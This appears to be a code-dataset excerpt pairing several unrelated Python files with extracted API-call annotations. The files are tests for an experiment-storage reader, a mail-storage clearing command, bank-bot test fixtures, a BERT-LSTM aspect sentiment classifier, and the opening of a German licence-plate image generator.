        self.folder_names_2 = sorted(self.folder_names_2)

    def tearDown(self):
        # Remove everything setUp created on disk.
        shutil.rmtree("temporary")

    def test_get_projects(self):
        """get_projects returns a list of dicts describing every stored project."""
        reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
        projects = reader.get_projects()
        self.assertIsInstance(projects, list)
        expected_names = ["test_project", "test_project_two"]
        expected_descs = ["test_description", "test_description_2"]
        for proj in projects:
            self.assertIn("project_name", proj)
            self.assertIn("project_description", proj)
            self.assertIn("last_time_updated", proj)
            self.assertIn(proj['project_name'], expected_names)
            self.assertIn(proj['project_description'], expected_descs)
            # Timestamp must be an ISO-8601 datetime with microseconds.
            self.assertRegex(proj['last_time_updated'], r"^[0-9]{4}-[0-9]{2}-[0-9]{2}T[0-9]{2}:[0-9]{2}:[0-9]{2}\.[0-9]{6}$")

    def test_get_project(self):
        """get_project returns a single project's metadata, or None when missing."""
        reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
        project = reader.get_project("test_project")
        self.assertEqual("test_project", project["project_name"])
        self.assertEqual("test_description", project["project_description"])
        self.assertRegex(project['last_time_updated'], r"^[0-9]{4}-[0-9]{2}-[0-9]{2}T[0-9]{2}:[0-9]{2}:[0-9]{2}\.[0-9]{6}$")
        project = reader.get_project("doesnt exist")
        self.assertIsNone(project)

    def test_has_project(self):
        """has_project reports existence of a project by name."""
        reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
        self.assertTrue(reader.has_project("test_project"))
        self.assertTrue(reader.has_project("test_project_two"))
        self.assertFalse(reader.has_project("non-exist"))

    def test_get_experiment(self):
        """get_experiment returns execution info, captured logs and results."""
        reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
        exp = reader.get_experiment("test_project", self.folder_names[0])
        self.assertIn("execution_info", exp)
        self.assertIn("logs", exp)
        self.assertIn("results", exp)
        # The experiment id doubles as its start time / folder name.
        self.assertEqual(exp["execution_info"]["start_time"], self.folder_names[0])
        self.assertIn("INFO:root:test_log", exp["logs"][0])
        self.assertEqual(exp["results"]["start_time"], self.folder_names[0])

    def test_get_experiments(self):
        """get_experiments returns all experiments for a project."""
        reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
        exps = reader.get_experiments("test_project")
        for exp in exps:
            self.assertIn(exp['execution_info']['start_time'], self.folder_names + self.folder_names_2)
            self.assertIn("INFO:root:test_log", exp["logs"][0])
            self.assertIn(exp['results']['start_time'], self.folder_names + self.folder_names_2)

    def test_has_experiment(self):
        """has_experiment checks project/experiment pairs, rejecting unknown ones."""
        reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
        for name in self.folder_names:
            self.assertTrue(reader.has_experiment("test_project", name))
        for name in self.folder_names_2:
            self.assertTrue(reader.has_experiment("test_project_two", name))
        self.assertFalse(reader.has_experiment("non-exist", "non-exists"))
        self.assertFalse(reader.has_experiment("test_project", "non-exists"))
        self.assertFalse(reader.has_experiment("test_project_two", "non-exists"))

    def test_get_experiment_files(self):
        """Each experiment folder carries the code snapshot, results and logs."""
        reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
        expected_files = [
            "code.zip",
            "results.json",
            "execution_info.json",
            "log.txt"
        ]
        for name in self.folder_names:
            files = reader.get_experiment_files("test_project", name)
            for f in expected_files:
                self.assertIn(f, files)
        for name in self.folder_names_2:
            files = reader.get_experiment_files("test_project_two", name)
            for f in expected_files:
                self.assertIn(f, files)

    def test_get_cache_files(self):
        """Cached model archives follow the model-<timestamp>-<hash>.zip pattern."""
        reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
        files = reader.get_project_cache("test_project")
        for f in files:
            self.assertRegex(f, r"^model-[T0-9\-]{26}-[a-z0-9]+\.zip$")

    def test_pull_experiment_files(self):
        """pull_experiment_file returns the raw bytes of a stored file."""
        reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
        log = reader.pull_experiment_file("test_project", self.folder_names[0], "log.txt")
        self.assertIsNotNone(log)
        log = log.decode('utf-8')
        self.assertIn("INFO:root:test_log", log.rstrip())
        log = reader.pull_experiment_file("test_project_two", self.folder_names_2[0], "log.txt")
        self.assertIsNotNone(log)
        log = log.decode('utf-8')
        self.assertIn("INFO:root:test_log", log.rstrip())

    def test_pull_cache_files(self):
        """pull_cache_file returns a zip whose contents match the original model."""
        reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
        cache_files = reader.get_project_cache("test_project")
        self.assertGreater(len(cache_files), 0)
        model = reader.pull_cache_file("test_project", cache_files[0])
        self.assertIsNotNone(model)
        # Round-trip through disk to verify the archive is a valid zip.
        with open("temporary/model.zip", "wb+") as f:
            f.write(model)
        with zipfile.ZipFile("temporary/model.zip", "r") as f:
            model_file = f.read("models/test.model")
            model_file = model_file.decode('utf-8')
            self.assertEqual("WEIGHTS", model_file)

    def test_pull_model(self):
        """pull_model by hash returns the same bytes as pulling the cache file."""
        reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
        cache_files = reader.get_project_cache("test_project")
        self.assertGreater(len(cache_files), 0)
        self.assertRegex(cache_files[0], r"^model.+-(.+)\.zip$")
        expected_file = reader.pull_cache_file("test_project", cache_files[0])
        # The hash is the last dash-separated component of the cache file name.
        model_hash = re.match(r"^model.+-(.+)\.zip$", cache_files[0]).group(1)
        pulled_file = reader.pull_model("test_project", model_hash)
        self.assertIsNotNone(pulled_file)
        self.assertEqual(expected_file, pulled_file)

    def test_replicate_file(self):
        """replicate with file_path restores the project tree on disk."""
        reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
        output = reader.replicate("test_project", self.folder_names[0], file_path="temporary/replication")
        self.assertEqual(output, "temporary/replication")
        expected_files = [
            '.surround',
            'models/test.model',
            'test_project/',
            'test_project/stages/baseline.py',
            'dodo.py',
        ]
        self.assertTrue(os.path.exists("temporary/replication"))
        for expected in expected_files:
            self.assertTrue(os.path.exists(os.path.join("temporary/replication", expected)))
        with open("temporary/replication/models/test.model", "r") as f:
            self.assertEqual("WEIGHTS", f.read())

    def test_replicate_zip(self):
        """replicate without file_path returns the project as zip bytes."""
        reader = ExperimentReader(storage_url="temporary/experiments", storage_driver=FileStorageDriver)
        output_zip = reader.replicate("test_project", self.folder_names[0])
        output_zip = BytesIO(output_zip)
        self.assertIsNotNone(output_zip)
        expected_files = [
            '.surround/config.yaml',
            'models/test.model',
            'test_project/__main__.py',
            'test_project/stages/baseline.py',
            'dodo.py',
        ]
        with zipfile.ZipFile(output_zip, "r") as f:
            for expected in expected_files:
                self.assertIn(expected, f.namelist())
| [
"os.path.exists",
"os.listdir",
"zipfile.ZipFile",
"subprocess.Popen",
"io.BytesIO",
"os.path.join",
"re.match",
"shutil.rmtree",
"logging.info"
] | [((635, 807), 'subprocess.Popen', 'subprocess.Popen', (["['surround', 'init', '-p', 'test_project', '-d', 'test_description', '-w', 'no'\n ]"], {'cwd': '"""temporary"""', 'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), "(['surround', 'init', '-p', 'test_project', '-d',\n 'test_description', '-w', 'no'], cwd='temporary', stdout=subprocess.\n PIPE, stderr=subprocess.PIPE)\n", (651, 807), False, 'import subprocess\n'), ((903, 1079), 'subprocess.Popen', 'subprocess.Popen', (["['surround', 'init', '-p', 'test_project_two', '-d', 'test_description',\n '-w', 'no']"], {'cwd': '"""temporary"""', 'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), "(['surround', 'init', '-p', 'test_project_two', '-d',\n 'test_description', '-w', 'no'], cwd='temporary', stdout=subprocess.\n PIPE, stderr=subprocess.PIPE)\n", (919, 1079), False, 'import subprocess\n'), ((1653, 1677), 'logging.info', 'logging.info', (['"""test_log"""'], {}), "('test_log')\n", (1665, 1677), False, 'import logging\n'), ((1870, 1894), 'logging.info', 'logging.info', (['"""test_log"""'], {}), "('test_log')\n", (1882, 1894), False, 'import logging\n'), ((2095, 2119), 'logging.info', 'logging.info', (['"""test_log"""'], {}), "('test_log')\n", (2107, 2119), False, 'import logging\n'), ((2402, 2478), 'os.listdir', 'os.listdir', (['"""temporary/experiments/experimentation/test_project/experiments"""'], {}), "('temporary/experiments/experimentation/test_project/experiments')\n", (2412, 2478), False, 'import os\n'), ((2509, 2594), 'os.listdir', 'os.listdir', (['"""temporary/experiments/experimentation/test_project_two/experiments"""'], {}), "('temporary/experiments/experimentation/test_project_two/experiments'\n )\n", (2519, 2594), False, 'import os\n'), ((2736, 2762), 'shutil.rmtree', 'shutil.rmtree', (['"""temporary"""'], {}), "('temporary')\n", (2749, 2762), False, 'import shutil\n'), ((10023, 10042), 'io.BytesIO', 'BytesIO', (['output_zip'], {}), '(output_zip)\n', (10030, 10042), False, 'from io 
import BytesIO\n'), ((1177, 1228), 'os.path.join', 'os.path.join', (['"""temporary"""', '"""test_project"""', '"""models"""'], {}), "('temporary', 'test_project', 'models')\n", (1189, 1228), False, 'import os\n'), ((1356, 1411), 'os.path.join', 'os.path.join', (['"""temporary"""', '"""test_project_two"""', '"""models"""'], {}), "('temporary', 'test_project_two', 'models')\n", (1368, 1411), False, 'import os\n'), ((8115, 8158), 'zipfile.ZipFile', 'zipfile.ZipFile', (['"""temporary/model.zip"""', '"""r"""'], {}), "('temporary/model.zip', 'r')\n", (8130, 8158), False, 'import zipfile\n'), ((9487, 9526), 'os.path.exists', 'os.path.exists', (['"""temporary/replication"""'], {}), "('temporary/replication')\n", (9501, 9526), False, 'import os\n'), ((10317, 10349), 'zipfile.ZipFile', 'zipfile.ZipFile', (['output_zip', '"""r"""'], {}), "(output_zip, 'r')\n", (10332, 10349), False, 'import zipfile\n'), ((8738, 8786), 're.match', 're.match', (['"""^model.+-(.+)\\\\.zip$"""', 'cache_files[0]'], {}), "('^model.+-(.+)\\\\.zip$', cache_files[0])\n", (8746, 8786), False, 'import re\n'), ((9612, 9659), 'os.path.join', 'os.path.join', (['"""temporary/replication"""', 'expected'], {}), "('temporary/replication', expected)\n", (9624, 9659), False, 'import os\n')] |
from __future__ import print_function
import os
from argparse import ArgumentParser, Namespace
from zope.interface import implementer
from quickmail.commands import ICommand
from quickmail.utils.misc import quick_mail_dir, heavy_tick, quick_mail_template_dir
@implementer(ICommand)
class ClearCommand:
    """Command that wipes locally stored quickmail data.

    By default only saved message bodies and templates (*.txt) are deleted;
    with the --justdoit flag the credential/token files (*.json, *.pickle)
    are removed instead.
    """

    def add_arguments(self, parser: ArgumentParser) -> None:
        """Register the clear command's CLI options on *parser*."""
        parser.add_argument(
            '-j',
            '--justdoit',
            action='store_true',
            help='clear storage including the credentials and token')
        parser.description = ('Use the clear command to clear all email body that are saved in your home directories. '
                              'Additionally, pass --justdoit to remove the credential files as well')

    def run_command(self, args: Namespace):
        """Delete stored files; which files depends on args.justdoit."""
        if not os.path.exists(quick_mail_dir):
            # Nothing has ever been stored, so there is nothing to clear.
            print('Storage already is empty ' + heavy_tick)
            return
        if args.justdoit:
            # Remove the credential and token files.
            for name in os.listdir(quick_mail_dir):
                if name.endswith('.json') or name.endswith('.pickle'):
                    os.remove(quick_mail_dir + '/' + name)
        else:
            # Remove saved message bodies, then saved templates.
            for name in os.listdir(quick_mail_dir):
                if name.endswith('.txt'):
                    os.remove(quick_mail_dir + '/' + name)
            for name in os.listdir(quick_mail_template_dir):
                if name.endswith('.txt'):
                    os.remove(quick_mail_template_dir + name)
        print('Storage cleared ' + heavy_tick + heavy_tick)

    def get_desc(self) -> str:
        """Short description shown in the command overview."""
        return 'clear the body of message from local or even the token if --justdoit argument is added'
| [
"os.path.exists",
"zope.interface.implementer",
"os.listdir",
"os.remove"
] | [((263, 284), 'zope.interface.implementer', 'implementer', (['ICommand'], {}), '(ICommand)\n', (274, 284), False, 'from zope.interface import implementer\n'), ((858, 888), 'os.path.exists', 'os.path.exists', (['quick_mail_dir'], {}), '(quick_mail_dir)\n', (872, 888), False, 'import os\n'), ((1567, 1608), 'os.remove', 'os.remove', (['(quick_mail_template_dir + file)'], {}), '(quick_mail_template_dir + file)\n', (1576, 1608), False, 'import os\n'), ((1177, 1215), 'os.remove', 'os.remove', (["(quick_mail_dir + '/' + file)"], {}), "(quick_mail_dir + '/' + file)\n", (1186, 1215), False, 'import os\n'), ((1380, 1418), 'os.remove', 'os.remove', (["(quick_mail_dir + '/' + file)"], {}), "(quick_mail_dir + '/' + file)\n", (1389, 1418), False, 'import os\n'), ((1460, 1495), 'os.listdir', 'os.listdir', (['quick_mail_template_dir'], {}), '(quick_mail_template_dir)\n', (1470, 1495), False, 'import os\n'), ((1040, 1066), 'os.listdir', 'os.listdir', (['quick_mail_dir'], {}), '(quick_mail_dir)\n', (1050, 1066), False, 'import os\n'), ((1274, 1300), 'os.listdir', 'os.listdir', (['quick_mail_dir'], {}), '(quick_mail_dir)\n', (1284, 1300), False, 'import os\n')] |
import os
import pytest
from bank_bot.banking_system import Database
class MockMessage(object):
    """Minimal stand-in for a Telegram-style bot message.

    Exposes the two attributes the bot reads: a ``json`` payload carrying
    the sender and chat ids, and the raw message ``text``.
    """

    def __init__(self, from_who, chat_id, message_text):
        sender = {"id": from_who}
        chat = {"id": chat_id}
        self.json = {"from": sender, "chat": chat}
        self.text = message_text
@pytest.fixture
def database():
    """Yield a Database backed by a throwaway file, removed after the test."""
    db_path = "test_database.db"
    db = Database(db_path)
    db.initialize_system()
    yield db
    # Teardown: drop the temporary database file.
    os.remove(db_path)
@pytest.fixture
def mock_message():
    """Return a canned MockMessage (sender id 2, chat id 2, text "Mock")."""
    return MockMessage(2, 2, "Mock")
| [
"bank_bot.banking_system.Database",
"os.remove"
] | [((347, 371), 'bank_bot.banking_system.Database', 'Database', (['test_file_path'], {}), '(test_file_path)\n', (355, 371), False, 'from bank_bot.banking_system import Database\n'), ((428, 453), 'os.remove', 'os.remove', (['test_file_path'], {}), '(test_file_path)\n', (437, 453), False, 'import os\n')] |
from typing import *
from dataclasses import asdict
from transformers import BertModel
from torch.nn.utils.rnn import pad_sequence
from stud.models.ner_classifier import NERClassifier
from stud.models.polarity_classifier import PolarityClassifier
from stud.constants import LOGGER_TRAIN_LOSS, LOGGER_VALID_LOSS, LOGGER_TEST_LOSS
from stud.torch_utils import batch_scatter_mean
from torchtext.vocab import Vocab
from stud import utils
import pytorch_lightning as pl
import torch
import torch.nn as nn
def model_from(hparams: utils.HParams, polarity_hparams: Optional[utils.HParams] = None) -> nn.Module:
    """Build the model selected by *hparams*.

    When *polarity_hparams* is given, both pretrained sub-models are restored
    from their checkpoints and combined into an AspectMultistepClassifier;
    otherwise the model named by ``hparams.model_name`` is constructed.
    """
    if polarity_hparams:
        # Two-stage setup: load the aspect (NER) and polarity models from disk.
        aspect_model = NERClassifier.load_from_checkpoint(hparams.ner_model_path, hparams=hparams)
        sentiment_model = PolarityClassifier.load_from_checkpoint(polarity_hparams.polarity_model_path, hparams=polarity_hparams)
        return AspectMultistepClassifier(aspect_model, sentiment_model)
    if hparams.model_name == 'bert_lstm':
        encoder = BertModel.from_pretrained(utils.get_bert_path(hparams))
        encoder.eval()  # BERT is used as a frozen encoder
        return BERTLSTMClassification(hparams, encoder)
    if hparams.model_name == 'multistep_classifier':
        raise Exception(f'Missing implementation of AspectMultistepClassifier!')
    raise Exception(f'{hparams.model_name} not supported!')
class BERTLSTMClassification(nn.Module):
    """Token classifier: frozen BERT encoder -> BiLSTM -> two-layer head."""

    def __init__(
        self,
        hparams: utils.HParams,
        bert: BertModel
    ):
        super().__init__()
        self.hparams = hparams
        self.bert = bert  # encoder runs under no_grad in forward()
        self.lstm = nn.LSTM(self.bert_output_dim, hparams.hidden_dim,
                            batch_first=True, bidirectional=True)
        # 2x hidden size on the way in because the LSTM is bidirectional.
        self.fc1 = nn.Linear(2 * hparams.hidden_dim, hparams.hidden_dim)
        self.fc2 = nn.Linear(hparams.hidden_dim, len(hparams.output_vocab))
        self.dropout = nn.Dropout(hparams.dropout)

    @property
    def bert_output_dim(self) -> int:
        """Width of the merged BERT embedding for the chosen pooling strategy."""
        if self.hparams.strategy == 'cat':
            # Concatenation stacks one hidden size per merged layer.
            return self.hparams.input_dim * len(self.hparams.layers_to_merge)
        return self.hparams.input_dim

    def forward(self, x: Dict[str, torch.Tensor]) -> torch.Tensor:
        # Encode with BERT without tracking gradients (frozen encoder).
        with torch.no_grad():
            encoded = self.bert(**x['batch'], output_hidden_states=True)
        features = utils.merge_layers(
            encoded.hidden_states, strategy=self.hparams.strategy,
            layers_to_merge=self.hparams.layers_to_merge
        )
        # Collapse WordPiece embeddings back into per-token embeddings.
        features = batch_scatter_mean(features, x['mask'])
        features, _ = self.lstm(self.dropout(features))
        features = torch.relu(self.dropout(self.fc1(features)))
        return self.fc2(features)
class ABSAClassifier(pl.LightningModule):
    '''
    NER classifier identifies aspect terms and polarities for task A+B.
    :param hparams: hyperparameters and target vocab to set up the model
    '''
    def __init__(self, hparams: utils.HParams):
        super().__init__()
        self.save_hyperparameters(asdict(hparams))
        self.output_dim = len(hparams.output_vocab)
        self.model = model_from(hparams)
        # Optional external scorer invoked in test_epoch_end; set by the caller.
        self.evaluate_callback = None
        # Vocab default index doubles as the padding/ignore label for the loss.
        self.ignore_index = hparams.output_vocab.get_default_index()
        self.loss_fn = nn.CrossEntropyLoss(ignore_index=self.ignore_index)
        # Accumulated across test_step calls; consumed in test_epoch_end.
        self.aspect_predictions = []
        self.aspect_indexes = []
        self.gold = []

    @property
    def bio_itos(self) -> Tuple[List[int], List[int], int]:
        ''' Returns the extended BIOs indexes. '''
        # (indices of all B-* tags, indices of all I-* tags, index of 'O').
        return (
            utils.vocab_tokens_startswith(self.hparams.output_vocab, 'B'),
            utils.vocab_tokens_startswith(self.hparams.output_vocab, 'I'),
            self.hparams.output_vocab['O'])

    def training_step(
        self,
        batch: Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]],
        batch_idx: int
    ) -> torch.Tensor:
        # Standard token-classification step: flatten to (tokens, classes).
        x, y = batch
        y_hat = self.model(x)
        loss = self.loss_fn(y_hat.view(-1, self.output_dim), y['ner'].view(-1).long())
        metrics = {LOGGER_TRAIN_LOSS: loss}
        self.log_dict(metrics, on_step=False, on_epoch=True)
        return loss

    @torch.no_grad()
    def evaluation(
        self,
        batch: Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]
    ) -> Tuple[torch.Tensor, torch.Tensor]:
        # Shared forward pass for validation/test; loss is skipped (0) when
        # running in test-only mode where no gold NER labels are available.
        x, y = batch
        y_hat = self.model(x)
        loss = 0
        if not self.hparams.test_only:
            loss = self.loss_fn(y_hat.view(-1, self.output_dim), y['ner'].view(-1).long())
        return loss, y_hat

    def validation_step(
        self,
        batch: Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]],
        batch_idx: int
    ):
        loss, logits = self.evaluation(batch)
        metrics = {LOGGER_VALID_LOSS: loss}
        self.log_dict(metrics, on_step=False, on_epoch=True)

    def test_step(
        self,
        batch: Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]],
        batch_idx: int = 0
    ) -> Tuple[List[List[str]], List[List[str]]]:
        x, y = batch
        loss, logits = self.evaluation(batch)
        y_hat = logits.argmax(-1)
        # Decode BIO predictions into per-sentence aspect index spans and the
        # raw per-span polarity label indices (one tuple pair per sentence).
        aspect_indexes, polarity_terms = zip(*[utils.extract_aspect_indices(
            prediction_idxs, length, *self.bio_itos, return_tensors=True
        ) for prediction_idxs, length in zip(y_hat.detach().cpu(), x['lengths'])])
        aspect_terms = self.batch_aspects_lookup(x['tokens'], aspect_indexes)
        polarity_terms = self.batch_aggregate_polarities(polarity_terms)
        # Accumulate per-batch outputs for test_epoch_end.
        self.aspect_indexes += aspect_indexes
        self.aspect_predictions += polarity_terms
        if not self.hparams.test_only:
            self.gold += [list(zip(*labels)) for labels in zip(y['aspect'], y['polarity_labels'])]
            assert len(self.aspect_indexes) == len(self.gold)
        metrics = {LOGGER_TEST_LOSS: loss}
        self.log_dict(metrics)
        return aspect_terms, polarity_terms

    def batch_aggregate_polarities(
        self,
        batch_idxs: List[int]
    ) -> List[List[str]]:
        # Map each span's polarity label indices to a single polarity string.
        return [[utils.aggregate_polarities(idxs, self.hparams.output_vocab) for idxs in sent_idxs] for sent_idxs in batch_idxs]

    def aspects_lookup(
        self,
        tokens: List[str],
        idxs: List[List[int]],
        sep: str = ' '
    ) -> List[List[str]]:
        ''' Returns the collection of tokens indexed by idxs. '''
        # NOTE(review): despite the List[str] hint, items must expose .text —
        # presumably spaCy-like token objects; confirm against the data module.
        return [sep.join([tokens[k].text for k in idx]) for idx in idxs]

    def batch_aspects_lookup(
        self,
        batch_tokens: List[List[str]],
        indexes: List[List[List[int]]]
    ) -> List[List[List[str]]]:
        ''' Batch-version of aspects_lookup. '''
        return [self.aspects_lookup(tokens, idxs) for idxs, tokens in zip(indexes, batch_tokens)]

    def test_epoch_end(self, outputs: Tuple[List[List[str]], List[List[str]]]) -> None:
        # Flatten the per-batch (aspect_terms, polarity_terms) pairs back into
        # two parallel per-sentence sequences, then pair them per target.
        aspect_terms, polarity_terms = zip(*[sample for batch in outputs for sample in zip(*batch)])
        self.predictions = [{'targets': list(zip(*pred))} for pred in zip(aspect_terms, polarity_terms)]
        if not self.hparams.test_only and self.evaluate_callback:
            # Gold targets are prefixed with a dummy field (1) to match the
            # evaluator's expected tuple layout.
            self.gold = [{'targets': [(1, *t) for t in terms]} for terms in self.gold]
            scores, precision, recall, f1 = self.evaluate_callback(self.gold, self.predictions)
            self.log_dict({'precision': precision, 'recall': recall, 'f1': f1})

    def configure_optimizers(self):
        # Plain Adam with library defaults.
        return torch.optim.Adam(self.model.parameters())
class AspectMultistepClassifier(pl.LightningModule):
    '''
    Experiment with a multistep classifier that predicts labels for A+B using
    individually trained models for task A and task B.
    '''
    def __init__(
        self,
        ner_model: pl.LightningModule,
        polarity_model: pl.LightningModule
    ):
        super().__init__()
        self.ner_model = ner_model
        self.polarity_model = polarity_model
        # Accumulated across evaluation calls; inspected after testing.
        self.predictions = []
        self.gold = []
        self.aspect_pred = []
        self.polarity_pred = []

    @torch.no_grad()
    def evaluation(
        self,
        batch: Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]]
    ):
        x, y = batch
        # Stage 1: the NER model predicts BIO tags per token.
        y_hat = self.ner_model.model(x).argmax(-1)
        # Extract aspect indexes from the first model
        # NOTE(review): uses self.ner_model.bio_idxs here, while ABSAClassifier
        # exposes a bio_itos property — verify the attribute name is correct.
        x['aspect_indexes'], _ = zip(*[utils.extract_aspect_indices(
            prediction_idxs, length, *self.ner_model.bio_idxs, return_tensors=True
        ) for prediction_idxs, length in zip(y_hat, x['lengths'])])
        # Join each predicted span's token texts into an aspect-term string.
        self.aspect_pred += [[' '.join([sent_tokens[idx].text for idx in idxs])
                              for idxs in sent_idx]
                             for sent_idx, sent_tokens in zip(x['aspect_indexes'], x['tokens'])]
        # Stage 2: the polarity model classifies the extracted spans.
        y_hat = self.polarity_model.model(x).argmax(-1)
        aspects_indexes = pad_sequence(
            [torch.ones(len(idxs)) for idxs in x['aspect_indexes']],
            batch_first=True, padding_value=self.polarity_model.ignore_index)
        # Apply masking to aspect_indexes, ignoring padded elements
        aspects_mask = aspects_indexes != self.polarity_model.ignore_index
        # Extract predictions from the second model
        self.polarity_pred += [pred[mask].tolist() for pred, mask in zip(y_hat, aspects_mask)]
        # Pair predictions of model A with predictions of model B (i.e. list of (term_i, polarity_i))
        # NOTE(review): this zips over the FULL accumulated aspect_pred /
        # polarity_pred each call, so earlier batches are re-appended into
        # self.predictions on every batch — looks like a duplication bug; confirm.
        self.predictions += [list(zip(aspects, predictions))
                             for aspects, predictions in zip(self.aspect_pred, self.polarity_pred)]
        # Store gold labels to perform evaluation
        gold_mask = y['polarity'] != self.polarity_model.ignore_index
        self.gold += [list(zip(aspects, polarities[mask].int().tolist()))
                      for aspects, polarities, mask in zip(y['aspect'], y['polarity'], gold_mask)]

    def test_step(
        self,
        batch: Tuple[Dict[str, torch.Tensor], Dict[str, torch.Tensor]],
        batch_idx: int
    ):
        x, y = batch
        # NOTE(review): evaluation() has no return statement, so `logits` is
        # always None here; results are only collected via the instance lists.
        logits = self.evaluation(batch)
| [
"stud.models.ner_classifier.NERClassifier.load_from_checkpoint",
"stud.utils.aggregate_polarities",
"torch.nn.Dropout",
"stud.utils.merge_layers",
"torch.nn.CrossEntropyLoss",
"dataclasses.asdict",
"stud.utils.vocab_tokens_startswith",
"torch.nn.LSTM",
"stud.torch_utils.batch_scatter_mean",
"stud.... | [((4402, 4417), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (4415, 4417), False, 'import torch\n'), ((8295, 8310), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (8308, 8310), False, 'import torch\n'), ((711, 786), 'stud.models.ner_classifier.NERClassifier.load_from_checkpoint', 'NERClassifier.load_from_checkpoint', (['hparams.ner_model_path'], {'hparams': 'hparams'}), '(hparams.ner_model_path, hparams=hparams)\n', (745, 786), False, 'from stud.models.ner_classifier import NERClassifier\n'), ((812, 920), 'stud.models.polarity_classifier.PolarityClassifier.load_from_checkpoint', 'PolarityClassifier.load_from_checkpoint', (['polarity_hparams.polarity_model_path'], {'hparams': 'polarity_hparams'}), '(polarity_hparams.\n polarity_model_path, hparams=polarity_hparams)\n', (851, 920), False, 'from stud.models.polarity_classifier import PolarityClassifier\n'), ((1649, 1740), 'torch.nn.LSTM', 'nn.LSTM', (['self.bert_output_dim', 'hparams.hidden_dim'], {'batch_first': '(True)', 'bidirectional': '(True)'}), '(self.bert_output_dim, hparams.hidden_dim, batch_first=True,\n bidirectional=True)\n', (1656, 1740), True, 'import torch.nn as nn\n'), ((1784, 1837), 'torch.nn.Linear', 'nn.Linear', (['(2 * hparams.hidden_dim)', 'hparams.hidden_dim'], {}), '(2 * hparams.hidden_dim, hparams.hidden_dim)\n', (1793, 1837), True, 'import torch.nn as nn\n'), ((1937, 1964), 'torch.nn.Dropout', 'nn.Dropout', (['hparams.dropout'], {}), '(hparams.dropout)\n', (1947, 1964), True, 'import torch.nn as nn\n'), ((2475, 2600), 'stud.utils.merge_layers', 'utils.merge_layers', (['batch_out.hidden_states'], {'strategy': 'self.hparams.strategy', 'layers_to_merge': 'self.hparams.layers_to_merge'}), '(batch_out.hidden_states, strategy=self.hparams.strategy,\n layers_to_merge=self.hparams.layers_to_merge)\n', (2493, 2600), False, 'from stud import utils\n'), ((2710, 2750), 'stud.torch_utils.batch_scatter_mean', 'batch_scatter_mean', (['batch_out', "x['mask']"], {}), "(batch_out, 
x['mask'])\n", (2728, 2750), False, 'from stud.torch_utils import batch_scatter_mean\n'), ((3495, 3546), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {'ignore_index': 'self.ignore_index'}), '(ignore_index=self.ignore_index)\n', (3514, 3546), True, 'import torch.nn as nn\n'), ((1067, 1095), 'stud.utils.get_bert_path', 'utils.get_bert_path', (['hparams'], {}), '(hparams)\n', (1086, 1095), False, 'from stud import utils\n'), ((2363, 2378), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2376, 2378), False, 'import torch\n'), ((3255, 3270), 'dataclasses.asdict', 'asdict', (['hparams'], {}), '(hparams)\n', (3261, 3270), False, 'from dataclasses import asdict\n'), ((3795, 3856), 'stud.utils.vocab_tokens_startswith', 'utils.vocab_tokens_startswith', (['self.hparams.output_vocab', '"""B"""'], {}), "(self.hparams.output_vocab, 'B')\n", (3824, 3856), False, 'from stud import utils\n'), ((3870, 3931), 'stud.utils.vocab_tokens_startswith', 'utils.vocab_tokens_startswith', (['self.hparams.output_vocab', '"""I"""'], {}), "(self.hparams.output_vocab, 'I')\n", (3899, 3931), False, 'from stud import utils\n'), ((6318, 6377), 'stud.utils.aggregate_polarities', 'utils.aggregate_polarities', (['idxs', 'self.hparams.output_vocab'], {}), '(idxs, self.hparams.output_vocab)\n', (6344, 6377), False, 'from stud import utils\n'), ((5418, 5512), 'stud.utils.extract_aspect_indices', 'utils.extract_aspect_indices', (['prediction_idxs', 'length', '*self.bio_itos'], {'return_tensors': '(True)'}), '(prediction_idxs, length, *self.bio_itos,\n return_tensors=True)\n', (5446, 5512), False, 'from stud import utils\n'), ((8589, 8694), 'stud.utils.extract_aspect_indices', 'utils.extract_aspect_indices', (['prediction_idxs', 'length', '*self.ner_model.bio_idxs'], {'return_tensors': '(True)'}), '(prediction_idxs, length, *self.ner_model.\n bio_idxs, return_tensors=True)\n', (8617, 8694), False, 'from stud import utils\n')] |
import argparse
import json
import os.path
import random
import re
import time
import cv2
import numpy as np
import requests
from PIL import Image
from config import config
class GermanLicensePlateImagesGenerator:
def __init__(self, output):
self.output = output
self.COUNTRY_MARKS = np.asarray([d['CM'] for d in json.loads(open(config.GERMAN_COUNTY_MARKS, encoding='utf-8').read())])
self.LETTERS = "ABCDEFGHIJKLMNOPQRSTUVWXYZÄÖÜ"
self.DIGITS = "0123456789"
self.COUNTRIES = ['BW', 'BY', 'BE', 'BB', 'HB', 'HH', 'HE', 'MV', 'NI', 'NW', 'RP', 'SL', 'SN', 'ST', 'SH', 'TH']
self.MONTHS = ['01', '02', '03', '04', '05', '06', '07', '08', '09', '10', '11', '12']
self.YEARS = ['06', '07', '08', '09', '10', '11', '12', '13', '14', '15', '16', '17']
random.seed()
@staticmethod
def get_image_url(license_number, country, month, year):
license_number = license_number.replace("-", "%3A").replace("Ä", "%C4").replace("Ö", "%D6").replace("Ü", "%DC")
